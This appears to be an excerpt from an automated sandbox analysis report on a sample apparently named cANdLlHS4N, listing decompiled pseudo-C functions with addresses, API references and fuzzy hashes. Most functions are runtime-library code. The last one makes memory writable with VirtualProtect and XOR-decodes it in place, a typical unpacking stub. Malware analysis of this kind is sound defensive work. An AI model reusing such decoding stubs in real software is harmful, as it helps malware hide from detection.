				 *((intOrPtr*)(__ecx + 0x40)) = 0;
				 *((intOrPtr*)(__ecx + 0x44)) = 0;
				 *((intOrPtr*)(__ecx + 0x48)) = 0;
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x50)) = 0;
				 *((char*)(_t72 - 4)) = 2;
				_t74 =  *0xd080a4; // 0x0
				if(_t74 == 0) {
					 *((intOrPtr*)(__ecx + 0x20)) = 1;
					E009C9BDB(__ecx); // executed
				} else {
					 *((intOrPtr*)(__ecx + 0x20)) = 0;
					_t75 =  *0xd0fb70; // 0x0
					if(_t75 == 0) {
						_t66 = E009A6291(_t75, 0x1c);
						 *((intOrPtr*)(_t72 + 8)) = _t66;
						 *((char*)(_t72 - 4)) = 3;
						if(_t66 == 0) {
							_t56 = 0;
							__eflags = 0;
						} else {
							_t56 = E009BBD78(_t66, 0xa);
						}
						 *((char*)(_t72 - 4)) = 2;
						 *0xd0fb70 = _t56;
					}
					_t77 =  *0xd0fb6c; // 0x0
					if(_t77 == 0) {
						_t64 = E009A6291(_t77, 0x20);
						 *((intOrPtr*)(_t72 + 8)) = _t64;
						 *((char*)(_t72 - 4)) = 4;
						_t78 = _t64;
						if(_t64 == 0) {
							_t54 = 0;
							__eflags = 0;
						} else {
							_t54 = E009C6A6A(_t64);
						}
						 *((char*)(_t72 - 4)) = 2;
						 *0xd0fb6c = _t54;
					}
					_t62 =  *0xd0fb70; // 0x0
					E009BBE03(_t62, _t78, _t71);
				}
				return E00AAD30A(_t71);
			}














      0x009c9c9a
      0x009c9c9a
      0x009c9ca1
      0x009c9ca6
      0x009c9ca8
      0x009c9cab
      0x009c9cb2
      0x009c9cbe
      0x009c9cc3
      0x009c9cd3
      0x009c9cdb
      0x009c9ce1
      0x009c9ce7
      0x009c9ced
      0x009c9cf0
      0x009c9cf3
      0x009c9cf6
      0x009c9cf9
      0x009c9cfc
      0x009c9cff
      0x009c9d02
      0x009c9d05
      0x009c9d0b
      0x009c9d0e
      0x009c9d11
      0x009c9d14
      0x009c9d17
      0x009c9d1a
      0x009c9d1d
      0x009c9d20
      0x009c9d24
      0x009c9d2a
      0x009c9d9f
      0x009c9da6
      0x009c9d2c
      0x009c9d2c
      0x009c9d2f
      0x009c9d35
      0x009c9d3f
      0x009c9d41
      0x009c9d44
      0x009c9d4a
      0x009c9d55
      0x009c9d55
      0x009c9d4c
      0x009c9d4e
      0x009c9d4e
      0x009c9d57
      0x009c9d5b
      0x009c9d5b
      0x009c9d60
      0x009c9d66
      0x009c9d70
      0x009c9d72
      0x009c9d75
      0x009c9d79
      0x009c9d7b
      0x009c9d84
      0x009c9d84
      0x009c9d7d
      0x009c9d7d
      0x009c9d7d
      0x009c9d86
      0x009c9d8a
      0x009c9d8a
      0x009c9d8f
      0x009c9d96
      0x009c9d96
      0x009c9db2

      APIs
      • __EH_prolog3.LIBCMT ref: 009C9CA1
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3_malloc
      • String ID:
      • API String ID: 2346879263-0
      • Opcode ID: 8af9aba8572ff8845adc828bbb3d1e58fb9f6e122412f45977bd2d5ba5e1f7f5
      • Instruction ID: ba6773f9bb1fed107dbf5b83f41420444ff8bc8a3f5408fe5b427093ba03f264
      • Opcode Fuzzy Hash: 8af9aba8572ff8845adc828bbb3d1e58fb9f6e122412f45977bd2d5ba5e1f7f5
      • Instruction Fuzzy Hash: 1631F3B0900B40DEC721DF6AC54579AFBE4BF94700F20491FE18AD7AA1DBB4A900CB56
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A1CE0 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
      Download Yara Rule
      C-Code - Quality: 87%
      			E009A1CE0(signed int __ecx, intOrPtr __edx, signed char* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t32;
				void* _t36;
				signed int _t43;
				signed int _t47;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t63;
				intOrPtr _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_v12 = 0;
				_v8 = 0;
				_t59 = _a12;
				if(_t59 >= 0 && (_t59 > 0 || _a8 > 0)) {
					do {
						_t32 = E009A1BC0(_t43);
						_t52 = _t49;
						_t56 = _t32;
						_t61 = _t52;
						if(_t61 < 0 || _t61 <= 0 && _t56 == 0) {
							_t49 =  *_t43;
							_t36 =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0xc))))( *_a4 & 0x000000ff); // executed
							_t47 = _t43 | 0xffffffff;
							if(_t36 != _t47) {
								_a4 =  &(_a4[1]);
								_v12 = _v12 + 1;
								asm("adc dword [ebp-0x4], 0x0");
								_a8 = _a8 + _t47;
								asm("adc [ebp+0x10], ecx");
								goto L14;
							}
						} else {
							_t63 = _a12 - _t52;
							if(_t63 <= 0 && (_t63 < 0 || _a8 < _t56)) {
								_t56 = _a8;
							}
							_t49 =  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x24))));
							E00AAB080(_t49, _a4, _t56);
							_a4 =  &(_a4[_t56]);
							_t58 = _t58 + 0xc;
							_v12 = _v12 + _t56;
							asm("adc [ebp-0x4], edi");
							_a8 = _a8 - _t56;
							asm("sbb [ebp+0x10], edi");
							 *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x34)))) =  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x34)))) - _t56;
							 *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x24)))) =  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x24)))) + _t56;
							goto L14;
						}
						break;
						L14:
						_t65 = _a12;
					} while (_t65 > 0 || _t65 >= 0 && _a8 > 0);
				}
				return _v12;
			}

















      0x009a1ce0
      0x009a1ce9
      0x009a1ceb
      0x009a1cee
      0x009a1cf1
      0x009a1cf4
      0x009a1d07
      0x009a1d09
      0x009a1d0e
      0x009a1d10
      0x009a1d12
      0x009a1d14
      0x009a1d63
      0x009a1d6b
      0x009a1d6d
      0x009a1d72
      0x009a1d79
      0x009a1d7c
      0x009a1d7f
      0x009a1d83
      0x009a1d86
      0x00000000
      0x009a1d86
      0x009a1d1c
      0x009a1d1f
      0x009a1d21
      0x009a1d2a
      0x009a1d2d
      0x009a1d35
      0x009a1d3a
      0x009a1d3f
      0x009a1d45
      0x009a1d48
      0x009a1d4b
      0x009a1d4e
      0x009a1d51
      0x009a1d54
      0x009a1d59
      0x00000000
      0x009a1d59
      0x00000000
      0x009a1d89
      0x009a1d89
      0x009a1d89
      0x009a1da0
      0x009a1dab

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memmove
      • String ID:
      • API String ID: 4104443479-0
      • Opcode ID: 488a4bf6a4083646c429ee38936c4c22e9e0762ab1822b3acbda9a345487fa90
      • Instruction ID: 0e4026bdaa76c9acfed79fee83c67beecbef652d7e451a96c40135afd4e7da07
      • Opcode Fuzzy Hash: 488a4bf6a4083646c429ee38936c4c22e9e0762ab1822b3acbda9a345487fa90
      • Instruction Fuzzy Hash: 62212B35900259EFCB54DE69C88469D77B9EF8A321F24856AEC29CB291D774CE80CFD0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AD57A Relevance: 1.6, APIs: 1, Instructions: 77COMMON
      Download Yara Rule
      C-Code - Quality: 93%
      			E009AD57A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t46;
				intOrPtr _t62;
				signed int _t64;
				signed int _t68;
				intOrPtr _t71;
				intOrPtr _t76;
				intOrPtr* _t82;
				void* _t84;
				void* _t88;

				_t88 = __eflags;
				_push(0x44);
				E00AAD2D1(0xac8015, __ebx, __edi, __esi);
				_push(E009AB424);
				 *((intOrPtr*)(_t84 - 0x28)) =  *((intOrPtr*)(_t84 + 8));
				_t62 = E009BCDBD(__ebx, 0xd0fd04, __edi, __esi, _t88);
				_t71 = 0;
				 *((intOrPtr*)(_t84 - 0x2c)) = _t62;
				if((0 | _t62 != 0x00000000) == 0) {
					E009B8782(0xd0fd04);
				}
				_t64 = 7;
				_t7 = _t62 + 0x58; // 0x58
				_t46 = memcpy(_t84 - 0x50, _t7, _t64 << 2);
				_t76 =  *((intOrPtr*)(_t84 + 0x10));
				_t82 =  *((intOrPtr*)(_t84 - 0x28));
				 *(_t62 + 0x60) = _t46;
				 *(_t62 + 0x58) =  *(_t84 + 0xc);
				 *((intOrPtr*)(_t62 + 0x5c)) = _t76;
				 *((intOrPtr*)(_t62 + 0x64)) =  *((intOrPtr*)(_t84 + 0x18));
				 *((intOrPtr*)(_t84 - 4)) = _t71;
				if(_t76 == 2 &&  *((intOrPtr*)(_t82 + 0x68)) != _t71) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t82 + 0x68)))) + 0x60))(_t71);
					_t71 = 0;
				}
				 *((intOrPtr*)(_t84 - 0x24)) = _t71;
				 *((intOrPtr*)(_t84 - 0x20)) = _t71;
				 *((intOrPtr*)(_t84 - 0x1c)) = _t71;
				 *((intOrPtr*)(_t84 - 0x18)) = _t71;
				 *((intOrPtr*)(_t84 - 0x28)) = _t71;
				if(_t76 == 0x110) {
					E009AB92C(_t82, _t84 - 0x24, _t84 - 0x28);
				}
				 *((intOrPtr*)(_t84 - 0x34)) =  *((intOrPtr*)( *_t82 + 0x114))(_t76,  *((intOrPtr*)(_t84 + 0x14)),  *((intOrPtr*)(_t84 + 0x18)));
				if(_t76 == 0x110) {
					E009AD4D9(_t62, _t71, _t82, _t84 - 0x24,  *((intOrPtr*)(_t84 - 0x28)));
				}
				_t36 = _t62 + 0x58; // 0x58
				_t68 = 7;
				_t83 = _t84 - 0x50;
				memcpy(_t36, _t84 - 0x50, _t68 << 2);
				return E00AAD32D(_t62, _t84 - 0x50 + _t68 + _t68, _t83);
			}












      0x009ad57a
      0x009ad57a
      0x009ad581
      0x009ad589
      0x009ad593
      0x009ad59b
      0x009ad59f
      0x009ad5a6
      0x009ad5ab
      0x009ad5ad
      0x009ad5ad
      0x009ad5b7
      0x009ad5b8
      0x009ad5be
      0x009ad5c0
      0x009ad5c6
      0x009ad5c9
      0x009ad5cf
      0x009ad5d2
      0x009ad5d5
      0x009ad5d8
      0x009ad5de
      0x009ad5eb
      0x009ad5ee
      0x009ad5ee
      0x009ad5f0
      0x009ad5f3
      0x009ad5f6
      0x009ad5f9
      0x009ad5fc
      0x009ad605
      0x009ad610
      0x009ad610
      0x009ad626
      0x009ad62f
      0x009ad639
      0x009ad639
      0x009ad66e
      0x009ad671
      0x009ad672
      0x009ad675
      0x009ad67c

      APIs
      • __EH_prolog3_catch_GS.LIBCMT ref: 009AD581
        • Part of subcall function 009BCDBD: __EH_prolog3.LIBCMT ref: 009BCDC4
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8H_prolog3H_prolog3_catch_Throw
      • String ID:
      • API String ID: 2399685165-0
      • Opcode ID: 5374bff2f71ca28375e228211766cfe5cfce328c4a2c88314aba672f1c98e9e4
      • Instruction ID: cda4e393cf4cc063b4558b4e9d3dfe03fdb15b35340d1a9e8ced44249c463016
      • Opcode Fuzzy Hash: 5374bff2f71ca28375e228211766cfe5cfce328c4a2c88314aba672f1c98e9e4
      • Instruction Fuzzy Hash: 293116B1E012089FCF08DFA8C8819DEBBF6BF89310F14442AE905AB655D734A940CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A2200 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
      Download Yara Rule
      C-Code - Quality: 88%
      			E009A2200(void* __edx, void* __edi, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				char _v16;
				intOrPtr* _v20;
				char _v36;
				char _v72;
				signed int _t25;
				intOrPtr* _t28;
				intOrPtr _t33;
				intOrPtr* _t36;
				signed char _t39;
				intOrPtr _t45;
				void* _t49;
				void* _t52;
				intOrPtr* _t55;
				signed int _t56;

				_t52 = __edi;
				_t49 = __edx;
				_push(0xffffffff);
				_push(0xac77fb);
				_push( *[fs:0x0]);
				_t25 =  *0xd0c910; // 0x3a0e8b0c
				_push(_t25 ^ _t56);
				 *[fs:0x0] =  &_v16;
				_t28 = _a4;
				_t39 = 0;
				_v20 = 0;
				if(_t28 != 0) {
					_t62 =  *_t28;
					if( *_t28 == 0) {
						_t55 = E009A6291(_t62, 0x18);
						_v20 = _t55;
						_v8 = 0;
						if(_t55 == 0) {
							_t55 = 0;
							__eflags = 0;
						} else {
							_t33 =  *_a8;
							_t45 =  *((intOrPtr*)(_t33 + 0x18));
							_t64 = _t45;
							if(_t45 == 0) {
								_t34 = _t33 + 0x1c;
								__eflags = _t33 + 0x1c;
							} else {
								_t34 = _t45;
							}
							E009A20A0( &_v72, _t49, _t52, _t34);
							_t39 = 1;
							 *((intOrPtr*)(_t55 + 4)) = 0;
							 *_t55 = 0xad6e3c;
							_t36 = E00AC5A33(_t52, _t64,  &_v36);
							 *((intOrPtr*)(_t55 + 8)) =  *_t36;
							 *((intOrPtr*)(_t55 + 0xc)) =  *((intOrPtr*)(_t36 + 4));
							 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t36 + 8));
							 *((intOrPtr*)(_t55 + 0x14)) =  *((intOrPtr*)(_t36 + 0xc));
						}
						_v8 = 0xffffffff;
						 *_a4 = _t55;
						if((_t39 & 0x00000001) != 0) {
							E009A2150(); // executed
						}
					}
				}
				 *[fs:0x0] = _v16;
				return 2;
			}


















      0x009a2200
      0x009a2200
      0x009a2203
      0x009a2205
      0x009a2210
      0x009a2216
      0x009a221d
      0x009a2221
      0x009a2227
      0x009a222a
      0x009a222c
      0x009a2231
      0x009a2237
      0x009a2239
      0x009a2246
      0x009a224b
      0x009a224e
      0x009a2253
      0x009a22a8
      0x009a22a8
      0x009a2255
      0x009a2258
      0x009a225a
      0x009a225d
      0x009a225f
      0x009a2265
      0x009a2265
      0x009a2261
      0x009a2261
      0x009a2261
      0x009a226c
      0x009a2275
      0x009a227a
      0x009a2281
      0x009a2287
      0x009a228e
      0x009a2294
      0x009a229a
      0x009a22a3
      0x009a22a3
      0x009a22ad
      0x009a22b4
      0x009a22b9
      0x009a22be
      0x009a22be
      0x009a22b9
      0x009a2239
      0x009a22cb
      0x009a22d8

      APIs
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      • __Getctype.LIBCPMT ref: 009A2287
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Getctype_malloc
      • String ID:
      • API String ID: 1151285845-0
      • Opcode ID: 17b681cd98098e862dad4ea9ea8eec62518bb1edb2f7261f3f77d3a315feba3d
      • Instruction ID: 9ac0a761d49f6001f4bbcc92c67ba7e55c2906bbc8f0747beba53b910db35567
      • Opcode Fuzzy Hash: 17b681cd98098e862dad4ea9ea8eec62518bb1edb2f7261f3f77d3a315feba3d
      • Instruction Fuzzy Hash: 4B217CB1A05605DFC728CF9CC881B9AB7F4FF49710F04866EE8269B791D771AA00CB90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A5590 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
      Download Yara Rule
      C-Code - Quality: 44%
      			E009A5590(intOrPtr* __ecx, void* __edx, signed int _a4) {
				intOrPtr _v0;
				signed int* _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t16;
				void* _t17;
				void* _t21;
				void* _t24;
				intOrPtr _t25;
				intOrPtr* _t27;
				intOrPtr* _t30;
				signed int _t31;
				void* _t43;
				void* _t44;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				void* _t50;

				_t27 = __ecx;
				E009A54F0(_t24, __ecx, __edx, _t43, _t46, 0x8007000e);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t47 =  *_t27;
				_t25 =  *((intOrPtr*)(_t47 - 0xc));
				_t48 = _t47 - 0x10;
				_v12 = _t27;
				_t16 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t48)) + 0x10))))(_t43, _t46, _t24, _t27, _t50);
				_t39 =  *((intOrPtr*)( *_t16));
				_t30 = _t16; // executed
				_t17 =  *((intOrPtr*)( *((intOrPtr*)( *_t16))))(_v0, 1); // executed
				_t44 = _t17;
				if(_t44 == 0) {
					E009A5590(_t30, _t39);
				}
				_t18 = _a4;
				if(_t25 < _a4) {
					_t18 = _t25;
				}
				_t6 = _t48 + 0x10; // 0x1
				_t7 = _t44 + 0x10; // 0x10
				_t31 = _t7;
				_a4 = _t31;
				E00AAC44E(_t31, _t18 + 1, _t6, _t18 + 1);
				 *((intOrPtr*)(_t44 + 4)) = _t25;
				_t10 = _t48 + 0xc; // -3
				_t21 = _t10;
				asm("lock xadd [eax], ecx");
				if((_t31 | 0xffffffff) - 1 <= 0) {
					_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t48)) + 4))))(_t48);
				}
				 *_v8 = _a4;
				return _t21;
			}























      0x009a5590
      0x009a5595
      0x009a559a
      0x009a559b
      0x009a559c
      0x009a559d
      0x009a559e
      0x009a559f
      0x009a55a6
      0x009a55a8
      0x009a55ab
      0x009a55ae
      0x009a55b9
      0x009a55c0
      0x009a55c5
      0x009a55c7
      0x009a55c9
      0x009a55cd
      0x009a55cf
      0x009a55cf
      0x009a55d4
      0x009a55d9
      0x009a55db
      0x009a55db
      0x009a55df
      0x009a55e3
      0x009a55e3
      0x009a55e8
      0x009a55eb
      0x009a55f3
      0x009a55f6
      0x009a55f6
      0x009a55fc
      0x009a5603
      0x009a560d
      0x009a560d
      0x009a5617
      0x009a561d

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memcpy_s
      • String ID:
      • API String ID: 2001391462-0
      • Opcode ID: bb27cc9c1c0c54715e5167daa2b6d13700dffbccc68468bcf44fe9e9898f7fda
      • Instruction ID: aa2c023e4eb86493edad9b4ad36c20cdfe13e34eac0f80eb74bb83a9077574ae
      • Opcode Fuzzy Hash: bb27cc9c1c0c54715e5167daa2b6d13700dffbccc68468bcf44fe9e9898f7fda
      • Instruction Fuzzy Hash: 23116076600A04AFD704DF6CC880D6AB3A9EF8A310721865DF5198B350EB71ED01CBD0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A2BE0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
      Download Yara Rule
      C-Code - Quality: 54%
      			E009A2BE0(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _t15;
				char _t19;
				intOrPtr* _t20;
				void* _t22;
				signed int _t24;
				intOrPtr* _t30;
				signed int _t43;
				signed int _t50;
				signed int _t51;

				_push(0xffffffff);
				_push(0xac78f8);
				_push( *[fs:0x0]);
				_t15 =  *0xd0c910; // 0x3a0e8b0c
				_push(_t15 ^ _t51);
				 *[fs:0x0] =  &_v16;
				_t19 = E009A1170(__ecx,  &_v20);
				_v8 = 0;
				_t20 = E009A25E0(_t19); // executed
				_t43 = _v20;
				_t30 = _t20;
				_v8 = 0xffffffff;
				if(_t43 != 0) {
					E00AC5AED( &_v24, 0);
					_t24 =  *(_t43 + 4);
					if(_t24 != 0 && _t24 < 0xffffffff) {
						 *(_t43 + 4) = _t24 - 1;
					}
					asm("sbb esi, esi");
					E00AC5B15( &_v24);
					_t50 =  !( ~( *(_t43 + 4))) & _t43;
					if(_t50 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t50))))(1);
					}
				}
				_t22 =  *((intOrPtr*)( *((intOrPtr*)( *_t30 + 0x18))))(_a4);
				 *[fs:0x0] = _v16;
				return _t22;
			}
















      0x009a2be3
      0x009a2be5
      0x009a2bf0
      0x009a2bf7
      0x009a2bfe
      0x009a2c02
      0x009a2c0c
      0x009a2c12
      0x009a2c19
      0x009a2c1e
      0x009a2c24
      0x009a2c26
      0x009a2c2f
      0x009a2c36
      0x009a2c3b
      0x009a2c40
      0x009a2c48
      0x009a2c48
      0x009a2c50
      0x009a2c57
      0x009a2c5c
      0x009a2c5e
      0x009a2c68
      0x009a2c68
      0x009a2c5e
      0x009a2c75
      0x009a2c7a
      0x009a2c88

      APIs
        • Part of subcall function 009A1170: std::_Lockit::_Lockit.LIBCPMT ref: 009A118C
        • Part of subcall function 009A25E0: std::_Lockit::_Lockit.LIBCPMT ref: 009A260D
        • Part of subcall function 009A25E0: std::_Lockit::_Lockit.LIBCPMT ref: 009A2630
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A2C36
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: LockitLockit::_std::_
      • String ID:
      • API String ID: 3382485803-0
      • Opcode ID: 3ef3947b69759da2a10f14b5534552d3d46e8a845f5437db6dc50b269ecbf8d5
      • Instruction ID: b01b5ac26b125f851254195411d217fc4b677f02b13b1f1c51debd717b4fd6dc
      • Opcode Fuzzy Hash: 3ef3947b69759da2a10f14b5534552d3d46e8a845f5437db6dc50b269ecbf8d5
      • Instruction Fuzzy Hash: ED114F71A00A15ABCB14DF68C981B9EB3B8FB59721F104769E929D7281E731A904CBD1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A11D0 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 95%
      			E009A11D0(void* __edx, long _a4, long _a8) {
				signed int _t16;
				long _t17;
				signed char _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				void* _t24;

				_t19 = __edx;
				_t22 = _a4;
				_t17 = 0;
				if(_t22 == 0) {
					L12:
					return 0;
				} else {
					_t23 = _a8;
					if(_t23 == 0) {
						goto L12;
					} else {
						_a4 = 0;
						VirtualProtect(_t22, _t23, 4,  &_a4); // executed
						if(_t23 > 0) {
							asm("cdq");
							_t16 = _t23 - _t19 >> 1;
							_t24 = _t22;
							do {
								_t18 =  *_t24;
								if(_t17 >= _t16) {
									_t20 = 8;
									do {
										_t18 = _t18 ^  *(_t20 + _t22 - 0x10);
										_t20 = _t20 + 2;
										 *_t24 = _t18;
									} while (_t20 < 0x10);
								} else {
									_t21 = 0;
									do {
										_t18 = _t18 ^  *(_t21 + _t22 - 0x10);
										_t21 = _t21 + 2;
										 *_t24 = _t18;
									} while (_t21 < 8);
								}
								_t17 = _t17 + 1;
								_t24 = _t24 + 1;
							} while (_t17 < _a8);
						}
						return 1;
					}
				}
			}












      0x009a11d0
      0x009a11d6
      0x009a11d9
